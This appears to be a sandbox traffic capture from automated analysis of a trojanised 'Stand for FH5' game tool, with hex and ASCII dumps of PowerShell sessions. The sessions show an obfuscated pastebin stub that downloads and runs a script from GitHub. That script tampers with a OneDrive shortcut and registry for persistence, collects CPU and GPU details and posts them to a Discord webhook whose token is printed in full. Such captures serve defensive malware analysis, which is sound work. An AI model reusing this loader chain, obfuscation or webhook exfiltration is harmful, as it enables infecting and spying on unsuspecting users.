                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 55 0d 00 00 01 00 55 0d 00 00 01 00 55 0d 00 00 01 00 80 02 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 30 06 00 00 01 00 00 0b 00 00 01 00 04 0b 00 00 02 00 37 02 00 00 01 00 9b 08 00 00 01 00 7a 05 09 00 ec 0a 01 00 11 00 ec 0a 06 00 19 00 ec 0a 0a 00 29 00 ec 0a 10 00 31 00 ec 0a 10 00 39
                                                                                    Data Ascii: UUU07z)19
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 03 00 04 80 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 65 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 7a 01 3b 01 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 7a 01 0f 0c 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 7a 01 53 08 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 83 01 3a 06 00 00 00 00 00 00 00 00 01 00 00 00 6c 0b 00 00 78 4e 00 00 01 00 00 00 82 0b 00 00 00 00 00 00 00 61 31 00 74 6f 6f 6c 53 74 72 69 70 53 74 61 74 75 73 4c 61 62 65 6c 31 00 66 6c 6f 77 4c 61 79 6f 75 74 50 61 6e 65 6c 31 00 46 6f 72 6d 31 00 73 74 61 74 75 73 53 74 72 69 70 31 00 67 72 6f 75 70 42 6f 78 31 00 49 6e 74 33 32 00 61 32 00 67 72 6f 75 70 42 6f 78 32 00 67 72 6f 75 70 42 6f 78 33 00 53 74 61 6e 64 20 66 6f 72 20 46 48 35 00 3c 4d 6f 64 75 6c 65 3e
                                                                                    Data Ascii: ez;zzS:lxNa1toolStripStatusLabel1flowLayoutPanel1Form1statusStrip1groupBox1Int32a2groupBox2groupBox3Stand for FH5<Module>
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 70 69 6c 61 74 69 6f 6e 52 65 6c 61 78 61 74 69 6f 6e 73 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 50 72 6f 64 75 63 74 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 70 79 72 69 67 68 74 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41 74 74 72 69 62 75 74 65 00 52 75 6e 74 69 6d 65 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 41 74 74 72 69 62 75 74 65 00 67 65 74 5f 56 61 6c 75 65 00 73 65 74 5f 56 61 6c 75 65 00 76 61 6c 75 65 00 53 74 61 6e 64 20 66 6f 72 20 46 48 35 2e 65 78 65 00 67 65 74 5f 53 69 7a 65 00 73 65 74 5f 53 69 7a 65 00 73 65 74 5f 41 75 74 6f 53 69 7a 65 00 73 65 74 5f 43 6c 69 65 6e 74 53 69 7a 65 00 49 53 75 70 70 6f 72 74 49 6e 69 74 69 61 6c 69 7a 65 00 46 6f 72 6d 31 5f 52 65 73 69
                                                                                    Data Ascii: pilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeget_Valueset_ValuevalueStand for FH5.exeget_Sizeset_Sizeset_AutoSizeset_ClientSizeISupportInitializeForm1_Resi
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 65 72 00 53 79 73 74 65 6d 2e 43 6f 64 65 44 6f 6d 2e 43 6f 6d 70 69 6c 65 72 00 70 61 74 74 65 72 6e 73 63 61 6e 54 69 6d 65 72 00 6d 61 69 6e 6c 6f 6f 70 54 69 6d 65 72 00 70 72 6f 63 65 73 73 57 61 69 74 54 69 6d 65 72 00 70 72 6f 63 65 73 73 53 74 61 72 74 54 69 6d 65 72 00 49 43 6f 6e 74 61 69 6e 65 72 00 67 65 74 53 70 69 6e 53 75 70 65 72 00 73 65 74 5f 55 73 65 56 69 73 75 61 6c 53 74 79 6c 65 42 61 63 6b 43 6f 6c 6f 72 00 67 65 74 5f 43 75 72 73 6f 72 00 53 65 74 53 79 73 74 65 6d 43 75 72 73 6f 72 00 2e 63 74 6f 72 00 2e 63 63 74 6f 72 00 49 6e 74 50 74 72 00 73 74 72 00 68 63 75 72 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 00 53 79 73 74
                                                                                    Data Ascii: erSystem.CodeDom.CompilerpatternscanTimermainloopTimerprocessWaitTimerprocessStartTimerIContainergetSpinSuperset_UseVisualStyleBackColorget_CursorSetSystemCursor.ctor.cctorIntPtrstrhcurSystem.DiagnosticsSystem.Runtime.InteropServicesSyst
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 63 00 72 00 56 00 61 00 6c 00 00 21 66 00 6c 00 6f 00 77 00 4c 00 61 00 79 00 6f 00 75 00 74 00 50 00 61 00 6e 00 65 00 6c 00 31 00 00 13 67 00 72 00 6f 00 75 00 70 00 42 00 6f 00 78 00 31 00 00 09 53 00 65 00 6c 00 66 00 00 11 61 00 64 00 64 00 78 00 70 00 42 00 74 00 6e 00 00 0d 41 00 64 00 64 00 20 00 58 00 50 00 00 11 61 00 64 00 64 00 78 00 70 00 56 00 61 00 6c 00 00 1f 67 00 65 00 74 00 53 00 70 00 69 00 6e 00 53 00 75 00 70 00 65 00 72 00 56 00 61 00 6c 00 00 23 67 00 65 00 74 00 53 00 70 00 69 00 6e 00 52 00 65 00 67 00 75 00 6c 00 61 00 72 00 56 00 61 00 6c 00 00 23 67 00 65 00 74 00 53 00 70 00 69 00 6e 00 52 00 65 00 67 00 75 00 6c 00 61 00 72 00 42 00 74 00 6e 00 00 1d 41 00 64 00 64 00 20 00 57 00 68 00 65 00 65 00 6c 00 73 00 70 00 69 00 6e
                                                                                    Data Ascii: crVal!flowLayoutPanel1groupBox1SelfaddxpBtnAdd XPaddxpValgetSpinSuperVal#getSpinRegularVal#getSpinRegularBtnAdd Wheelspin


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49764 | 104.20.3.235 | 443 | 7548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 16:08:26 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: pastebin.com
                                                                                    Connection: Keep-Alive
2024-10-15 16:08:26 UTC | 397 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 15 Oct 2024 16:08:26 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    x-frame-options: DENY
                                                                                    x-content-type-options: nosniff
                                                                                    x-xss-protection: 1;mode=block
                                                                                    cache-control: public, max-age=1801
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 625
                                                                                    Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d31115bbafeeaa4-DFW
2024-10-15 16:08:26 UTC | 139 | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                    Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 16:08:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49772 | 185.199.109.133 | 443 | 7548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 16:08:27 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    Connection: Keep-Alive
2024-10-15 16:08:27 UTC | 900 | IN | HTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 7508
                                                                                    Cache-Control: max-age=300
                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: deny
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 16:08:27 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdal2120147-DFW
                                                                                    X-Cache: HIT
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1729008508.672456,VS0,VE1
                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    X-Fastly-Request-ID: a517ae11f5430e7c3dbc3b799ef68f49134e885a
                                                                                    Expires: Tue, 15 Oct 2024 16:13:27 GMT
                                                                                    Source-Age: 207
                                                                                    2024-10-15 16:08:27 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                    Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                    2024-10-15 16:08:27 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                    Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                    2024-10-15 16:08:27 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                    Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                    2024-10-15 16:08:27 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                    Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                    2024-10-15 16:08:27 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                    Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                    2024-10-15 16:08:27 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                    Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    4 | 192.168.2.7 | 49775 | 162.159.138.232 | 443 | 6648 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-15 16:08:27 UTC | 311 | OUT | POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Content-Type: application/json
                                                                                    Host: discord.com
                                                                                    Content-Length: 215
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 16:08:27 UTC | 215 | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 46 48 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 36 48 4b 47 5a 42 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                                                    Data Ascii: { "content": "**user** has joined - FH5\n----------------------------------\n**GPU:** 6HKGZB\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                                                    2024-10-15 16:08:27 UTC | 1251 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 15 Oct 2024 16:08:27 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 45
                                                                                    Connection: close
                                                                                    Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1729008509
                                                                                    x-ratelimit-reset-after: 1
                                                                                    via: 1.1 google
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=imyMIeHTEUKrovK9QjsYTPhziEcFHvbCRUmlHJ04Sdmlni2azLULDXKhTQkqtByBt2d%2BDgG9HPAIrcuLyL3JBGB3bLQkl2IhNuZitGsHxCfOPpeMjmsew252GVSl"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Set-Cookie: __cfruid=79c012eaf9029fed6f4174fc912d62fc9df2f131-1729008507; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                    Set-Cookie: _cfuvid=NRZYuviVxKznP8b._.zmL4nobhKDT8sSIL_kl3WgFCM-1729008507935-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d311165fb836c3d-DFW
                                                                                    2024-10-15 16:08:27 UTC | 45 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                    Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    5 | 192.168.2.7 | 49810 | 104.20.3.235 | 443 | 7912 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-15 16:08:34 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: pastebin.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 16:08:34 UTC | 397 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 15 Oct 2024 16:08:34 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    x-frame-options: DENY
                                                                                    x-content-type-options: nosniff
                                                                                    x-xss-protection: 1;mode=block
                                                                                    cache-control: public, max-age=1801
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 633
                                                                                    Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d31118ff88be9b9-DFW
                                                                                    2024-10-15 16:08:34 UTC | 139 | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                    Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                    2024-10-15 16:08:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    6 | 192.168.2.7 | 49821 | 185.199.109.133 | 443 | 7912 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-15 16:08:35 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 16:08:36 UTC | 900 | IN | HTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 7508
                                                                                    Cache-Control: max-age=300
                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: deny
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 16:08:36 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdfw8210072-DFW
                                                                                    X-Cache: HIT
                                                                                    X-Cache-Hits: 1
                                                                                    X-Timer: S1729008516.045638,VS0,VE1
                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    X-Fastly-Request-ID: eab2a342711277d383aefab66267ea15291ef5d0
                                                                                    Expires: Tue, 15 Oct 2024 16:13:36 GMT
                                                                                    Source-Age: 215
